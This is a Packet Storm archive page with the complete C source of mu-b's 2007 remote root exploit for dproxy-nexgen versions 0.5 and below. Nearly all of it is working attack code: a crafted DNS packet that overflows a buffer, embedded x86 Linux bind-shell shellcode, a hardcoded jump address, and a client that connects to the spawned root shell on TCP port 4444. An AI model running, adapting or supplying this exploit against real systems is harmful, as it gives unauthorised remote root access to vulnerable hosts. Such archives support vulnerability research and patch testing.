what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

dproxy-v1.c

dproxy-v1.c
Posted Apr 2, 2007
Authored by mu-b

Remote exploit for dproxy versions 0.5 and below. Binds a shell to TCP port 4444.

tags | exploit, remote, shell, tcp
SHA-256 | 71d56c60f1e232a94229b71556636b01433745ed2ae92d6b6761ae4dc0da6e6e

dproxy-v1.c

Change Mirror Download
/* dproxy-v1.c
*
* Copyright (c) 2007 by <mu-b@digit-labs.org>
*
* dproxy-nexgen remote root exploit (x86-lnx)
* by mu-b - Mar 2007
*
* - Tested on: dproxy-nexgen (.tar.gz)
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; version 2 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* http://www.digit-labs.org/ -- Digit-Labs 2007!@$!
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netdb.h>

#define BUF_SIZE 512
#define NOP 0x41

#define DEF_PORT 53
#define PORT_DNS DEF_PORT
#define PORT_SHELL 4444

const u_char bndshell_lnx[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xcd\x80";

#define NUM_TARGETS 1

struct target_t
{
const u_char *name;
const int len;
const int zshell_pos;
const u_char *zshell;
const int fp_pos;
const u_long fp;
};

/* fp = objdump -D dproxy | grep "ff e2" */
struct target_t targets[] = {
{"dproxy-nexgen (tar.gz)",
512, 25, bndshell_lnx, 284, 0x08048cf9}
,
{0}
};

static int sock_send (int sock, u_char * src, int len);
static int sock_recv (int sock, u_char * dst, int len);
static void sock_send_udp (u_char * host, int port, u_char * src, int len);
static int sockami (u_char * host, int port);
static void shellami (int sock);
static void zbuffami (u_char * zbuf, struct target_t *trgt);

static int
sock_send (int sock, u_char * src, int len)
{
int sbytes;

sbytes = send (sock, src, len, 0);

return (sbytes);
}

static int
sock_recv (int sock, u_char * dst, int len)
{
int rbytes;

rbytes = recv (sock, dst, len, 0);
if (rbytes >= 0)
dst[rbytes] = '\0';

return (rbytes);
}

static void
sock_send_udp (u_char * host, int port, u_char * src, int len)
{
struct sockaddr_in address;
struct hostent *hp;
int sock;

fflush (stdout);
if ((sock = socket (AF_INET, SOCK_DGRAM, 0)) == -1)
{
perror ("socket()");
exit (-1);
}

if ((hp = gethostbyname (host)) == NULL)
{
perror ("gethostbyname()");
exit (-1);
}

memset (&address, 0, sizeof (address));
memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
address.sin_family = AF_INET;
address.sin_port = htons (port);

sendto (sock, src, len, 0, (struct sockaddr *) &address, sizeof (address));
}

static int
sockami (u_char * host, int port)
{
struct sockaddr_in address;
struct hostent *hp;
int sock;

fflush (stdout);
if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1)
{
perror ("socket()");
exit (-1);
}

if ((hp = gethostbyname (host)) == NULL)
{
perror ("gethostbyname()");
exit (-1);
}

memset (&address, 0, sizeof (address));
memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
address.sin_family = AF_INET;
address.sin_port = htons (port);

if (connect (sock, (struct sockaddr *) &address, sizeof (address)) == -1)
{
perror ("connect()");
exit (EXIT_FAILURE);
}

return (sock);
}

static void
shellami (int sock)
{
int n;
fd_set rset;
u_char recvbuf[1024], *cmd = "id; uname -a; uptime\n";

sock_send (sock, cmd, strlen (cmd));

while (1)
{
FD_ZERO (&rset);
FD_SET (sock, &rset);
FD_SET (STDIN_FILENO, &rset);
select (sock + 1, &rset, NULL, NULL, NULL);
if (FD_ISSET (sock, &rset))
{
if ((n = sock_recv (sock, recvbuf, sizeof (recvbuf) - 1)) <= 0)
{
fprintf (stderr, "Connection closed by foreign host.\n");
exit (EXIT_SUCCESS);
}
printf ("%s", recvbuf);
}
if (FD_ISSET (STDIN_FILENO, &rset))
{
if ((n = read (STDIN_FILENO, recvbuf, sizeof (recvbuf) - 1)) > 0)
{
recvbuf[n] = '\0';
sock_send (sock, recvbuf, n);
}
}
}
}

static void
zbuffami (u_char * zbuf, struct target_t *trgt)
{
int i;
u_char *ptr;

ptr = zbuf;
memset (ptr, NOP, trgt->len);

*ptr++ = 0x69; /* transaction id */
*ptr++ = 0x69;
*ptr++ = 0x81; /* flags */
*ptr++ = 0x80;
*ptr++ = 0x00; /* number of questions */
*ptr++ = 0x00;
*ptr++ = 0x00; /* number of answers */
*ptr++ = 0x01;
*ptr++ = 0x00; /* number of authority rr's */
*ptr++ = 0x00;
*ptr++ = 0x00; /* number of additional rr's */
*ptr++ = 0x00;

*ptr++ = 0xc0; /* compressed name &ptr+18 */
*ptr++ = 0x18;
*ptr++ = 0x00; /* type = PTR */
*ptr++ = 0x0c;
*ptr++ = 0x07; /* class = jmp short +0x07 */
*ptr++ = 0xeb;

*ptr++ = 0xff; /* ttl */
*ptr++ = 0xff;
*ptr++ = 0xff;
*ptr++ = 0xff;

*ptr++ = 0x01; /* data length = 488 bytes */
*ptr++ = 0xe8;

/* wire format name */
for (i = 0; i < 2; i++, ptr += 0x7f) {
*ptr++ = 0x7f;
memset (ptr, NOP, 0x7f);
}

*ptr++ = 0x02; /* padding */
*ptr++ = NOP;
*ptr++ = NOP;
*ptr++ = 0x00; /* terminate name */

/* terminate buffer */
ptr = zbuf + trgt->len - 1;
*ptr-- = 0x2e;
*ptr = 0x2e;

memcpy (zbuf + trgt->zshell_pos, trgt->zshell, strlen (trgt->zshell));

zbuf[trgt->fp_pos] = (u_char) (trgt->fp & 0x000000ff);
zbuf[trgt->fp_pos + 1] = (u_char) ((trgt->fp & 0x0000ff00) >> 8);
zbuf[trgt->fp_pos + 2] = (u_char) ((trgt->fp & 0x00ff0000) >> 16);
zbuf[trgt->fp_pos + 3] = (u_char) ((trgt->fp & 0xff000000) >> 24);
}

int
main (int argc, char **argv)
{
int sock;
u_char zbuf[BUF_SIZE];
struct target_t *trgt;

printf ("dproxy-nexgen remote root exploit\n"
"by: <mu-b@digit-labs.org>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");

if (argc <= 2)
{
fprintf (stderr, "Usage: %s <host> <target>\n", argv[0]);
exit (EXIT_SUCCESS);
}

if (atoi (argv[2]) >= NUM_TARGETS)
{
fprintf (stderr, "Only %d targets known!!\n", NUM_TARGETS);
exit (EXIT_SUCCESS);
}

trgt = &targets[atoi (argv[2])];
printf ("+Attacking to %s...\n", argv[1]);

printf ("fp: 0x%x\n", (int) trgt->fp);
printf ("buf len: %d\n", trgt->len);

printf ("+Building buffer with shellcode...");
memset (zbuf, 0x00, sizeof (zbuf));
zbuffami (zbuf, trgt);
printf (" done\n");

printf ("+Sending Payload...");
sock_send_udp (argv[1], PORT_DNS, zbuf, BUF_SIZE);
printf (" done\n");

printf ("+Waiting for the shellcode to be executed...\n");
sleep (1);
sock = sockami (argv[1], PORT_SHELL);
printf ("+Wh00t!\n\n");
shellami (sock);

return (EXIT_SUCCESS);
}
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close